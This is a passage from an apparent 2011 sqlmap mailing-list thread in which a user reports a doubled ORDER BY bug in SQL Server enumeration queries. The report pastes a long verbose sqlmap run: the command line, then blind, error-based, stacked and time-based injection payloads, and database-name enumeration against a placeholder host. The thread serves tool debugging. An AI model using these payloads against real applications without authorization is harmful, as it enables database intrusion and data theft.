AND 'KnEl'='KnEl > [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:47] [PAYLOAD] 20111' AND > 8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:48] [PAYLOAD] 20111' AND > 5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 5 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT > [09:55:48] 
[DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:48] [PAYLOAD] 20111' AND > 2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:48] [PAYLOAD] 20111' AND > 6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:49] [PAYLOAD] 20111' AND > 6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:49] [PAYLOAD] 20111' AND > 5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'VLNB'='VLNB > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:49] [PAYLOAD] 20111' AND > 3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE 
name NOT IN (SELECT TOP 10 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:49] [PAYLOAD] 20111' AND > 9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:50] [PAYLOAD] 20111' AND > 8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:50] [PAYLOAD] 20111' AND > 5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:50] [PAYLOAD] 20111' AND > 7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo > [09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:51] 
[PAYLOAD] 20111' AND > 2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD > [09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:52] [PAYLOAD] 20111' AND > 3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:53] [PAYLOAD] 20111' AND > 2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:53] [PAYLOAD] 20111' AND > 2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:53] [PAYLOAD] 20111' AND > 4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM > master..sysdatabases ORDER BY 
1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:54] [PAYLOAD] 20111' AND > 6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:54] [PAYLOAD] 20111' AND > 4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:54] [PAYLOAD] 20111' AND > 9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:55] [PAYLOAD] 20111' AND > 4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:55] [PAYLOAD] 20111' AND > 
4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:55] [PAYLOAD] 20111' AND > 5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:56] [PAYLOAD] 20111' AND > 445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases > WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY 1 > ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > AND 'COwJ'='COwJ > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:56] [PAYLOAD] 20111' AND > 5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:57] [PAYLOAD] 20111' AND > 67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases > WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY 1 > ORDER BY name) ORDER BY 
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > AND 'STKX'='STKX > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:57] [PAYLOAD] 20111' AND > 4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:57] [PAYLOAD] 20111' AND > 8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:57] [PAYLOAD] 20111' AND > 7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx > [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:58] [PAYLOAD] 20111' AND > 3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd > [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:58] [PAYLOAD] 20111' AND > 6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > 
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT > [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:56:00] [PAYLOAD] 20111' AND > 9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk > [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:56:00] [PAYLOAD] 20111' AND > 4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER > [09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:56:01] [PAYLOAD] 20111' AND > 703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases > WHERE name NOT IN (SELECT TOP 36 name FROM master..sysdatabases ORDER BY 1 > ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > AND 'MPbC'='MPbC > [09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:56:02] [DEBUG] performed 38 queries in 16 seconds > available databases [37]: > > [09:56:02] [WARNING] HTTP error codes detected during testing: > 500 (Internal Server Error) - 62 times > [09:56:02] [INFO] Fetched data logged to text files under > '/path/sqlmap-dev/output/www.vuln.com' > > [*] shutting down at: 09:56:02 > > David > > 
-- 
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia |
From: David G. <sk...@gm...> - 2011-02-09 12:25:20
|
There is an error with SQL Server queries, probably in queries.xml? The problem is these two ORDER BYs in the query sent to the server (--db, --tables, etc.). I checked it after upgrading to the latest svn revision.

20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases *ORDER BY 1 ORDER BY name*) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'ORDER'.

Log:

#./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u " http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush --batch | tee saida.txt

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 09:55:04

[09:55:04] [DEBUG] cleaning up configuration parameters
[09:55:04] [DEBUG] setting the HTTP timeout
[09:55:04] [DEBUG] setting the HTTP Cookie header
[09:55:04] [DEBUG] setting the HTTP method to GET
[09:55:04] [DEBUG] creating HTTP requests opener object
[09:55:04] [WARNING] the testable parameter 'p' you provided is not into the Cookie
[09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' as session file
[09:55:04] [INFO] flushing session file
[09:55:04] [INFO] testing connection to the target url
[09:55:05] [INFO] testing if the url is stable, wait a few seconds
[09:55:06] [INFO] url is stable
[09:55:06] [PAYLOAD] 20111'(''')"(''
[09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be injectable (possible DBMS: Microsoft SQL Server)
[09:55:07] [INFO] testing sql injection on GET parameter 'p'
[09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965
[09:55:08] [DEBUG] setting match ratio for
current parameter to 0.952 [09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152 [09:55:08] [PAYLOAD] 20111 AND 3013=569 [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 [09:55:08] [PAYLOAD] 20111 AND 4255=4255 [09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn [09:55:10] [DEBUG] setting match ratio for current parameter to 0.952 [09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa [09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG [09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)' because the payload for boolean-based blind has 
already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [09:55:11] [PAYLOAD] 20111' AND 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl [09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the payload for error-based has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the payload for error-based has already been identified [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [09:55:11] [PAYLOAD] 
20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos [09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos [09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase stacked queries' injectable [09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua [09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua [09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase time-based blind' injectable [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - 
Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause 
(ctxsys.drithsx.sn)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the payload for error-based has already been identified [09:55:33] 